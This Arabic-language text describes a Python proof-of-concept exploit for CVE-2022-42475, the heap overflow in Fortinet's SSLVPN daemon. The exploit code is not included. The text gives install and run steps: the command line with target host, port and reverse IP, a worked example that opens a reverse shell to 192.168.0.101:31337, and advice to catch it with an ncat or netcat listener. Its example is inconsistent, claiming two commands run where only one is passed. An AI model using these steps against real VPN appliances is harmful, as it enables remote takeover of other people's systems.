
استغلال Python لـ CVE-2022-42475 تجاوز سعة الكومة في برنامج Fortinet SSLVPN الخفي. يوفر قشرة عكسية عبر pwntools مع هدف ومنفذ وأوامر قابلة للتخصيص.
كود POC لاستغلال تجاوز سعة الكومة (Heap Overflow) في برنامج SSLVPN الخفي لشركة Fortinet
pip install pwntools لاستخدام هذا الكود، يمكنك حفظه في ملف، مثلاً exploit.py، ثم تشغيله باستخدام Python في سطر الأوامر مع تمرير الوسائط المطلوبة. إليك مثالاً لأمر تشغيل هذا الاستغلال:
python exploit.py <target_host> <target_port> <reverse_ip>
استبدل <target_host> باسم المضيف أو عنوان IP للنظام المستهدف، و<target_port> برقم منفذ الخدمة الضعيفة، و<reverse_ip> بعنوان IP للجهاز الذي تريد استقبال الصدفة عليه. أما الوسائط المتبقية فهي الأوامر التي تريد تنفيذها، مفصولة بمسافات.
على سبيل المثال، إذا كان عنوان IP للنظام المستهدف هو 192.168.0.100، والخدمة الضعيفة تعمل على المنفذ 8080، وتريد تنفيذ الأمرين ls و id، فستشغل الأمر التالي:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
سيؤدي هذا إلى إنشاء اتصال صدفة عكسية بالعنوان 192.168.0.101:31337 وتنفيذ الأمرين ls و id على النظام المستهدف. لاحظ أنك ستحتاج إلى تشغيل مستمع (listener) على عنوان IP والمنفذ المحددين لاستقبال الصدفة العكسية. يمكنك استخدام أدوات مثل ncat أو netcat لإنشاء مستمع.